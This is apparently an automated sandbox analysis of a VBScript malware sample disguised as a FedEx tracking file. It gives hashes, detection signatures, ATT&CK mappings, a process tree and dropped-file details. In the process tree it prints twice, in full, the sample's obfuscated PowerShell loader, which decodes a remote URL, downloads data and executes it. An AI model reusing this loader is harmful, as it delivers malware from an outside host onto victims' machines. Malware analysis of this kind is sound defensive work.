3fe507970779d2d32f1b4083e87417da3fb7b026b3caf42e6b61ec2a9150a30f

General

Target

CR-FEDEX_TN-775720741041.vbs
Size

229KB
MD5

337a01a2cdc2ce2af2292b25005b2ae9
SHA1

ccf44f87fdb19956aaad1b12895de16bb0c0a0f4
SHA256

3fe507970779d2d32f1b4083e87417da3fb7b026b3caf42e6b61ec2a9150a30f
SHA512

6b3b6bd69cfbf831ce873c2876ea09802de3927acd59d9c257b2cc58f08eeb5283f477e979341967c5e71e6e9a73fcb40636d58fbbf5ed5b7ec5ce981606ae80
SSDEEP

6144:JjvimEeg2kae621pGqbWt0JPvk+r+usYBbnPZnqtFVyNLFViFHV/O3CLpzTE8pGH:JiWqv6uVKlGH

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
6	3476	WScript.exe
16	620	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5052	4728	WerFault.exe	107

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
2660	ping.exe
2392	ping.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
620	powershell.exe
620	powershell.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe
4728	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	4728	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3476 wrote to memory of 2660	3476	WScript.exe	87
PID 3476 wrote to memory of 2660	3476	WScript.exe	87
PID 3476 wrote to memory of 2392	3476	WScript.exe	89
PID 3476 wrote to memory of 2392	3476	WScript.exe	89
PID 3476 wrote to memory of 4868	3476	WScript.exe	91
PID 3476 wrote to memory of 4868	3476	WScript.exe	91
PID 3476 wrote to memory of 620	3476	WScript.exe	93
PID 3476 wrote to memory of 620	3476	WScript.exe	93
PID 620 wrote to memory of 2900	620	powershell.exe	95
PID 620 wrote to memory of 2900	620	powershell.exe	95
PID 620 wrote to memory of 4728	620	powershell.exe	107
PID 620 wrote to memory of 4728	620	powershell.exe	107
PID 620 wrote to memory of 4728	620	powershell.exe	107
PID 4728 wrote to memory of 2172	4728	powershell.exe	108
PID 4728 wrote to memory of 2172	4728	powershell.exe	108
PID 4728 wrote to memory of 2172	4728	powershell.exe	108

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CR-FEDEX_TN-775720741041.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3476
- C:\Windows\System32\ping.exe
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2660
- C:\Windows\System32\ping.exe
  ping %.%.%.%
  2⤵
  - Runs ping.exe
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir
  2⤵
  PID:4868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Found = 1;$Laundress='Substrin';$Laundress+='g';Function gouge($Tikronesedlerne){$Forbehandler=$Tikronesedlerne.Length-$Found;For($Mget=5; $Mget -lt $Forbehandler; $Mget+=(6)){$Trovrdigstes+=$Tikronesedlerne.$Laundress.Invoke($Mget, $Found);}$Trovrdigstes;}function Ndudgangenes($Gedeost){& ($Bygningsfejl) ($Gedeost);}$Afrigningen=gouge 'Indt,MlsninoPermizFu.esi JocolUpstal UndeaAffi,/prima5 orby.Diasc0 El e Annon(u.trkWP afyibarranUnderdInnumoE,bowwIne psSkinf StrenNDopniTunpli Lgger1 F be0Bruse.Under0 Begi;Musik PrimeW ryddi,ronenSenat6Versi4Uncom; Adjo FieldxGrevs6Centr4 Ring; a se GedderdraabvGoofa:Denti1Hvidt2St,le1 Coun.P ste0Jesp.) Udko KbekrGFusene P.epcRe,axkSnowioleefa/ Paga2Goril0Anti.1Ekpho0 Gaff0 ,nta1Canan0Wa,dw1 Buc bobleFgtteri Elvrr ChameLantaf,ftero nonexJunke/Dekre1Exte 2Xerop1No co.Geome0Testp ';$Muckier=gouge 'steelUcarvisfrdsee melerS ept-SprogATriodgWo dteEmanenOmga tAnden ';$Skabehovedernes=gouge 'P,lmehTempetPristt NonmpSperm:Uncon/vildt/RestfnIncomiAvocatOutfii Odono,olar.Br nzcPyasvoEnetamBortf/ RodfkTolv.oI.dfaoScrip1a,nor/HovedDLangteArkivcQuaeriCanabpAlterhIndopeLoricrCyath.Ste ccAmag sSkrukvGudma ';$Tammeste=gouge '.onre> Syss ';$Bygningsfejl=gouge 'SlrhaiMexiceMilorx,cgon ';$Linguaciousness = gouge 'Rav eeRegrecberkhh OmbyoNedko vrge%ScullaAn aapKan.spSrnumdStueua K.rrtP.llaaCirca%B,rmh\UnflaRl.kkee.dcelpFunktrGrns,eTaxiasNarraedatidnSkos,tMenora Jambt,lampiDebatoRel,cnMala.i grupsNonm mSmogg.CutleNNep,roBac,enConve Mi.de&tegn,& Genn Arvebe FuglcOpuschImperoSmag .heir$Objek ';Ndudgangenes (gouge 'Duckh$ .masg Udvil.rakeof,endbFuncta IdollMuddl: TbruGKa.ytlSuperoRebukoDriftmDecelfTyranuDiskelFurbil NgenyTalel=Aquar(P eudc ArdemBl.dfd Afvi Trkp,/RicedcBabyh workf$ Me.iLSh.maiVovsenMoyengRisikuUnderaprotocAfrigiMiljso Cla,uPplp.s Tornn K ndeL.gensI.flasLaten) Vari ');Ndudgangenes (gouge 'Phyto$ nablgKa itl Outco.omfrbS,udraUndfll B.ig:B,ansG laadr BrumnBeflinAt aceSlantsCount=T,rsi$Int.lSHerackPagumaO ticb BraseM layhDrakmoHal,bvPedoseSpanndTandbeScre.rDissenKostaesydstsReinq.M.nimsNonexpBl.krlBranci Troct Skat(v,gge$PilotTObcoma Res mmrklgmK,ekre,onfrsByggetskedeeVikar)bushw ');$Skabehovedernes=$Grnnes[0];Ndudgangenes (gouge '.olen$FredsgAch,tlTammaoWhorebUnexaa winelTurte:KundeBSukkeaAnlgssPaleoi I cagTamaraVelstm SteryDu,li=OktroN Folke PriswAa,in- SyneOT.mbabRetshjGnagseForskcParoxt Germ enervSLow ny stolsC artt Re teCykelm unqu.SkalpNOmegaePythotCalyc.DehydWMela.e ScrebExcerCBragglM.stiiJomf.eKeysmndorertBrugs ');Ndudgangenes (gouge 'O.era$PuzzoBPe,dias,spes rouniS,ratgBothiaJrgenmnoncoyGaine.HjemsHLaarteDisora UngddD.mokeRuficr,fsbnsHydro[M.nro$SpathM Impru.iffecDiphek KnstiEquisegloher Dren] Coun=Septi$PsychAStiftfFr borVablei EdougC,smenEmplaiMetalnPr,mogV.ldtedoc.mnOmnim ');$Parodiens=gouge 'In,raBTryllaClemcsvi,aliPligtgTol taTrophmBarony Krop.IllumDHariboS lmewStofpn WildlB,rdeoShonkaBalu dForskFTop,eiSkridl,elireAvast( Penc$RespoSMinesk rksuaVi mabI.luseS ilehDollhoHidinvHillte PepsdHydr eJag,srDommenFlyveeKildesKa.ef,Scrag$ SpasSNaturkSprinrPaabum ForsrK stauBondelRettelDankeeNoteskRe nsoAftrkm ModemMacroa TitrnStavedK ldeo S cr) R,di ';$Parodiens=$Gloomfully[1]+$Parodiens;$Skrmrullekommando=$Gloomfully[0];Ndudgangenes (gouge 'Bipen$Edelwg HerelBantuo blrebBr.shaGerbilWh le:.enilS Rapnp KonviOsphrl utrio,astugkinesaDungylbandeeB,spe=Fo,ro(NonapT.atteeForsosBen ntEstru-BrobyP LungaPr,votStanghEnre Brill$.remaSTyresk Kr,drAandfmAstrirDampsu Tolvl A.ndlPestieMalerk EileoBr.ttmBrakem Karia,nlovnSond,dHi choKursu)Fngse ');while (!$Spilogale) {Ndudgangenes (gouge 'T mad$ Jemag SmoolSp efoDemonbDagreaTirsdlNephr:RedbrE Cyklk Tonesmitr kH,vedl UngeuI dtad Neede uterOestri ,etanOvertgAfladeTzar,r Ka,pn ,epreSpongs.elat=Fil,e$NyordtSkovlrHachiuSkabee Coxc ') ;Ndudgangenes $Parodiens;Ndudgangenes (gouge 'N.kkeSAcadetHermiaOphthrBegumtKulrc-F.elsSErstalBugteeChiaseGrftep Mord Trfri4Extra ');Ndudgangenes (gouge ' bior$LsgnggUkronlUselvoForglbTanaiaSincel Dril:UdsmySReindpIleo,iBone.l ordfo Lycighot haGun.olFor ee Slui=Skrup(bogenT lude UndesRe letBronz- S.anPImpleaDerivt JannhShant Polic$friskSS bitkOerkerSkattmPredirMolybuTenialLy phl cat eCaulokForeaoFa,rimSubhemC cotaSupranConindDi eco,omme)Laane ') ;Ndudgangenes (gouge 'Sokke$ FnomgSygemlBesseoFilmibKoloraAvopal Un e:Federp KultaAccumr,uatoaSchoolS,pray haa.s Coe,efor adAv.shl F viy Stud= Mi,t$L epugEpi.rlBekymoSk klbTikroaAfstsl Dola:IguanWWoopsi Sailn KerntfinskeFourcr Formb DerioUddanu FjernInterd Rast+Stege+Tremm%Marty$SporoGappelr Sk,pnRurignTvelyeClocksIdrts.omlasc ynamo GodkuNe,rin FrastTemat ') ;$Skabehovedernes=$Grnnes[$paralysedly];}Ndudgangenes (gouge ',nlig$ Fiarg ,abbl Fol,o Pr.sbLaseraSadhilEurop:GlatbEMithrp.roteiNymarg Maral JoinomarsktFo fatFalkeiSump,d DorsecupiuaAn,vanSkyd Prer=Nontu Ps.udGPa,ageFroghtOrdin-IndusC VentoLicitnTemputg.ogeeIndtrnPensitDiver Malt$ TobaS jarakSafa rConvemStrafrDeniguSivsalMyldrlFle ue TilbkAdel.o IslnmQuietmWraina Snefn unindAttaco W sk ');Ndudgangenes (gouge 'Resti$ rchig KomflMiraboKulkabE,docaBehallTrane:ByronSDamebtP,oblrForsteOveregafme,eU.hoopForlsaFetaepskjoriIndstrNeatgeUn,tutForpuse,cep Fo.om=Aerol ,rim[Rel,tSA,gifyUltrasDiscitAquifeVa igmBoomi.UnproC OutfoSmertn OpkovGrosbeCrisprRest,t Prer]Drv,y:Woodb:MalleF.paavrUti,so ubstmBaadvBGldelaPassisDeb teSe,su6Stand4Vare,SFrus tEman,rKlumpiIntern GanggS,rip( Nyer$NdudvESavskpKee.aiJrv.ugSith.l undeoKv ult.ftvitvrdigiAsc,rdN,rdbeGo.okaBilpan Epex)S rga ');Ndudgangenes (gouge ' Subt$Brystg ,hoblEksteoNrta.bSeptaaTransl St w: HelaARetyimFoemeeCam,slObseriAlnaso BiskrSt,reamrkemtTotaliGuillos.culnForvasOdont Mdel,= Afga Cera.[Pers.SPerisy BothsSavletdeltheZaka mLinge.astroT Fa teChaptxGrafit alve. BagvEDiatonLedelcKognioAsktwd FljtiHenbin.cripgAmaur] ari:Comme:StnksASnittSS.ellCOpholIUnde,IThira.,alblGBianie dysutKompoSNec stYie,drTufs,iBesinn S.olgKejse(Brolg$jordsSAero,t.xsolr I,dle,dgifgG aveeThyrspHalveaepha p StofiSnyltr Duste overtSlambsHensy)Flerb ');Ndudgangenes (gouge 'Garnn$.vorigFrustlSinguoKlne.bAtrcra GerelHomog:DomsmTlandsaDuplik OvernU dereKastam .aanmPackieWoodelKvindiJulelg.ntiq=D.all$Ant aAE plimStrikeKoldkl KrediObtaio Ha,vrtankaaFoelgtSelekiDesceoGamacn dresN tsi.ReprisBarbeuSprkkbOutmasint,rt HandrForsti Mesan ebrigDagle( Pseu3Progr2Told 7Wh,st5Be id7Comed9Ginne,Unpr.2Forpu9Stivf0 Mine2N.gat1 Cala)Str.c ');Ndudgangenes $Taknemmelig;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Representationism.Non && echo $"
    3⤵
    PID:2900
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Found = 1;$Laundress='Substrin';$Laundress+='g';Function gouge($Tikronesedlerne){$Forbehandler=$Tikronesedlerne.Length-$Found;For($Mget=5; $Mget -lt $Forbehandler; $Mget+=(6)){$Trovrdigstes+=$Tikronesedlerne.$Laundress.Invoke($Mget, $Found);}$Trovrdigstes;}function Ndudgangenes($Gedeost){& ($Bygningsfejl) ($Gedeost);}$Afrigningen=gouge 'Indt,MlsninoPermizFu.esi JocolUpstal UndeaAffi,/prima5 orby.Diasc0 El e Annon(u.trkWP afyibarranUnderdInnumoE,bowwIne psSkinf StrenNDopniTunpli Lgger1 F be0Bruse.Under0 Begi;Musik PrimeW ryddi,ronenSenat6Versi4Uncom; Adjo FieldxGrevs6Centr4 Ring; a se GedderdraabvGoofa:Denti1Hvidt2St,le1 Coun.P ste0Jesp.) Udko KbekrGFusene P.epcRe,axkSnowioleefa/ Paga2Goril0Anti.1Ekpho0 Gaff0 ,nta1Canan0Wa,dw1 Buc bobleFgtteri Elvrr ChameLantaf,ftero nonexJunke/Dekre1Exte 2Xerop1No co.Geome0Testp ';$Muckier=gouge 'steelUcarvisfrdsee melerS ept-SprogATriodgWo dteEmanenOmga tAnden ';$Skabehovedernes=gouge 'P,lmehTempetPristt NonmpSperm:Uncon/vildt/RestfnIncomiAvocatOutfii Odono,olar.Br nzcPyasvoEnetamBortf/ RodfkTolv.oI.dfaoScrip1a,nor/HovedDLangteArkivcQuaeriCanabpAlterhIndopeLoricrCyath.Ste ccAmag sSkrukvGudma ';$Tammeste=gouge '.onre> Syss ';$Bygningsfejl=gouge 'SlrhaiMexiceMilorx,cgon ';$Linguaciousness = gouge 'Rav eeRegrecberkhh OmbyoNedko vrge%ScullaAn aapKan.spSrnumdStueua K.rrtP.llaaCirca%B,rmh\UnflaRl.kkee.dcelpFunktrGrns,eTaxiasNarraedatidnSkos,tMenora Jambt,lampiDebatoRel,cnMala.i grupsNonm mSmogg.CutleNNep,roBac,enConve Mi.de&tegn,& Genn Arvebe FuglcOpuschImperoSmag .heir$Objek ';Ndudgangenes (gouge 'Duckh$ .masg Udvil.rakeof,endbFuncta IdollMuddl: TbruGKa.ytlSuperoRebukoDriftmDecelfTyranuDiskelFurbil NgenyTalel=Aquar(P eudc ArdemBl.dfd Afvi Trkp,/RicedcBabyh workf$ Me.iLSh.maiVovsenMoyengRisikuUnderaprotocAfrigiMiljso Cla,uPplp.s Tornn K ndeL.gensI.flasLaten) Vari ');Ndudgangenes (gouge 'Phyto$ nablgKa itl Outco.omfrbS,udraUndfll B.ig:B,ansG laadr BrumnBeflinAt aceSlantsCount=T,rsi$Int.lSHerackPagumaO ticb BraseM layhDrakmoHal,bvPedoseSpanndTandbeScre.rDissenKostaesydstsReinq.M.nimsNonexpBl.krlBranci Troct Skat(v,gge$PilotTObcoma Res mmrklgmK,ekre,onfrsByggetskedeeVikar)bushw ');$Skabehovedernes=$Grnnes[0];Ndudgangenes (gouge '.olen$FredsgAch,tlTammaoWhorebUnexaa winelTurte:KundeBSukkeaAnlgssPaleoi I cagTamaraVelstm SteryDu,li=OktroN Folke PriswAa,in- SyneOT.mbabRetshjGnagseForskcParoxt Germ enervSLow ny stolsC artt Re teCykelm unqu.SkalpNOmegaePythotCalyc.DehydWMela.e ScrebExcerCBragglM.stiiJomf.eKeysmndorertBrugs ');Ndudgangenes (gouge 'O.era$PuzzoBPe,dias,spes rouniS,ratgBothiaJrgenmnoncoyGaine.HjemsHLaarteDisora UngddD.mokeRuficr,fsbnsHydro[M.nro$SpathM Impru.iffecDiphek KnstiEquisegloher Dren] Coun=Septi$PsychAStiftfFr borVablei EdougC,smenEmplaiMetalnPr,mogV.ldtedoc.mnOmnim ');$Parodiens=gouge 'In,raBTryllaClemcsvi,aliPligtgTol taTrophmBarony Krop.IllumDHariboS lmewStofpn WildlB,rdeoShonkaBalu dForskFTop,eiSkridl,elireAvast( Penc$RespoSMinesk rksuaVi mabI.luseS ilehDollhoHidinvHillte PepsdHydr eJag,srDommenFlyveeKildesKa.ef,Scrag$ SpasSNaturkSprinrPaabum ForsrK stauBondelRettelDankeeNoteskRe nsoAftrkm ModemMacroa TitrnStavedK ldeo S cr) R,di ';$Parodiens=$Gloomfully[1]+$Parodiens;$Skrmrullekommando=$Gloomfully[0];Ndudgangenes (gouge 'Bipen$Edelwg HerelBantuo blrebBr.shaGerbilWh le:.enilS Rapnp KonviOsphrl utrio,astugkinesaDungylbandeeB,spe=Fo,ro(NonapT.atteeForsosBen ntEstru-BrobyP LungaPr,votStanghEnre Brill$.remaSTyresk Kr,drAandfmAstrirDampsu Tolvl A.ndlPestieMalerk EileoBr.ttmBrakem Karia,nlovnSond,dHi choKursu)Fngse ');while (!$Spilogale) {Ndudgangenes (gouge 'T mad$ Jemag SmoolSp efoDemonbDagreaTirsdlNephr:RedbrE Cyklk Tonesmitr kH,vedl UngeuI dtad Neede uterOestri ,etanOvertgAfladeTzar,r Ka,pn ,epreSpongs.elat=Fil,e$NyordtSkovlrHachiuSkabee Coxc ') ;Ndudgangenes $Parodiens;Ndudgangenes (gouge 'N.kkeSAcadetHermiaOphthrBegumtKulrc-F.elsSErstalBugteeChiaseGrftep Mord Trfri4Extra ');Ndudgangenes (gouge ' bior$LsgnggUkronlUselvoForglbTanaiaSincel Dril:UdsmySReindpIleo,iBone.l ordfo Lycighot haGun.olFor ee Slui=Skrup(bogenT lude UndesRe letBronz- S.anPImpleaDerivt JannhShant Polic$friskSS bitkOerkerSkattmPredirMolybuTenialLy phl cat eCaulokForeaoFa,rimSubhemC cotaSupranConindDi eco,omme)Laane ') ;Ndudgangenes (gouge 'Sokke$ FnomgSygemlBesseoFilmibKoloraAvopal Un e:Federp KultaAccumr,uatoaSchoolS,pray haa.s Coe,efor adAv.shl F viy Stud= Mi,t$L epugEpi.rlBekymoSk klbTikroaAfstsl Dola:IguanWWoopsi Sailn KerntfinskeFourcr Formb DerioUddanu FjernInterd Rast+Stege+Tremm%Marty$SporoGappelr Sk,pnRurignTvelyeClocksIdrts.omlasc ynamo GodkuNe,rin FrastTemat ') ;$Skabehovedernes=$Grnnes[$paralysedly];}Ndudgangenes (gouge ',nlig$ Fiarg ,abbl Fol,o Pr.sbLaseraSadhilEurop:GlatbEMithrp.roteiNymarg Maral JoinomarsktFo fatFalkeiSump,d DorsecupiuaAn,vanSkyd Prer=Nontu Ps.udGPa,ageFroghtOrdin-IndusC VentoLicitnTemputg.ogeeIndtrnPensitDiver Malt$ TobaS jarakSafa rConvemStrafrDeniguSivsalMyldrlFle ue TilbkAdel.o IslnmQuietmWraina Snefn unindAttaco W sk ');Ndudgangenes (gouge 'Resti$ rchig KomflMiraboKulkabE,docaBehallTrane:ByronSDamebtP,oblrForsteOveregafme,eU.hoopForlsaFetaepskjoriIndstrNeatgeUn,tutForpuse,cep Fo.om=Aerol ,rim[Rel,tSA,gifyUltrasDiscitAquifeVa igmBoomi.UnproC OutfoSmertn OpkovGrosbeCrisprRest,t Prer]Drv,y:Woodb:MalleF.paavrUti,so ubstmBaadvBGldelaPassisDeb teSe,su6Stand4Vare,SFrus tEman,rKlumpiIntern GanggS,rip( Nyer$NdudvESavskpKee.aiJrv.ugSith.l undeoKv ult.ftvitvrdigiAsc,rdN,rdbeGo.okaBilpan Epex)S rga ');Ndudgangenes (gouge ' Subt$Brystg ,hoblEksteoNrta.bSeptaaTransl St w: HelaARetyimFoemeeCam,slObseriAlnaso BiskrSt,reamrkemtTotaliGuillos.culnForvasOdont Mdel,= Afga Cera.[Pers.SPerisy BothsSavletdeltheZaka mLinge.astroT Fa teChaptxGrafit alve. BagvEDiatonLedelcKognioAsktwd FljtiHenbin.cripgAmaur] ari:Comme:StnksASnittSS.ellCOpholIUnde,IThira.,alblGBianie dysutKompoSNec stYie,drTufs,iBesinn S.olgKejse(Brolg$jordsSAero,t.xsolr I,dle,dgifgG aveeThyrspHalveaepha p StofiSnyltr Duste overtSlambsHensy)Flerb ');Ndudgangenes (gouge 'Garnn$.vorigFrustlSinguoKlne.bAtrcra GerelHomog:DomsmTlandsaDuplik OvernU dereKastam .aanmPackieWoodelKvindiJulelg.ntiq=D.all$Ant aAE plimStrikeKoldkl KrediObtaio Ha,vrtankaaFoelgtSelekiDesceoGamacn dresN tsi.ReprisBarbeuSprkkbOutmasint,rt HandrForsti Mesan ebrigDagle( Pseu3Progr2Told 7Wh,st5Be id7Comed9Ginne,Unpr.2Forpu9Stivf0 Mine2N.gat1 Cala)Str.c ');Ndudgangenes $Taknemmelig;"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Representationism.Non && echo $"
      4⤵
      PID:2172
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 2400
      4⤵
      Program crash
      PID:5052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 4728 -ip 4728
1⤵
PID:1268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Remote System Discovery

1

T1018

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oxfzydoe.0el.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Representationism.Non

Filesize
464KB

MD5
35917e3477a60b9bb3ddd56aa690b33e

SHA1
51e7016a935af04dcfbe7ded85490a1d7a554fe7

SHA256
c3b7ee58f6e70d1b00b95a6e76bb47e0ab364427480aae74b46ad4294af16ad5

SHA512
18db9c25c10f5680a642f0664568c744b0d4deef449b3891061c65471191f4514606044639fc943a82228469d7245ea6b4ab65d923898838754c208df4691f1d

Download Submit
memory/620-13-0x000001F3B73B0000-0x000001F3B73D2000-memory.dmp

Filesize
136KB

Download
memory/620-14-0x00007FFFF95F0000-0x00007FFFFA0B1000-memory.dmp

Filesize
10.8MB

Download
memory/620-15-0x000001F3B7230000-0x000001F3B7240000-memory.dmp

Filesize
64KB

Download
memory/620-16-0x000001F3B7230000-0x000001F3B7240000-memory.dmp

Filesize
64KB

Download
memory/620-19-0x000001F3B7230000-0x000001F3B7240000-memory.dmp

Filesize
64KB

Download
memory/620-48-0x00007FFFF95F0000-0x00007FFFFA0B1000-memory.dmp

Filesize
10.8MB

Download
memory/4728-26-0x0000000005650000-0x00000000056B6000-memory.dmp

Filesize
408KB

Download
memory/4728-38-0x0000000005D60000-0x0000000005DAC000-memory.dmp

Filesize
304KB

Download
memory/4728-24-0x0000000004CF0000-0x0000000004D12000-memory.dmp

Filesize
136KB

Download
memory/4728-25-0x00000000055E0000-0x0000000005646000-memory.dmp

Filesize
408KB

Download
memory/4728-22-0x00000000024C0000-0x00000000024D0000-memory.dmp

Filesize
64KB

Download
memory/4728-36-0x00000000056C0000-0x0000000005A14000-memory.dmp

Filesize
3.3MB

Download
memory/4728-37-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

Filesize
120KB

Download
memory/4728-23-0x0000000004F40000-0x0000000005568000-memory.dmp

Filesize
6.2MB

Download
memory/4728-39-0x0000000007540000-0x0000000007BBA000-memory.dmp

Filesize
6.5MB

Download
memory/4728-40-0x0000000006240000-0x000000000625A000-memory.dmp

Filesize
104KB

Download
memory/4728-41-0x0000000006F70000-0x0000000007006000-memory.dmp

Filesize
600KB

Download
memory/4728-42-0x0000000006F00000-0x0000000006F22000-memory.dmp

Filesize
136KB

Download
memory/4728-43-0x0000000008170000-0x0000000008714000-memory.dmp

Filesize
5.6MB

Download
memory/4728-21-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/4728-45-0x0000000074D90000-0x0000000075540000-memory.dmp

Filesize
7.7MB

Download
memory/4728-20-0x00000000023D0000-0x0000000002406000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing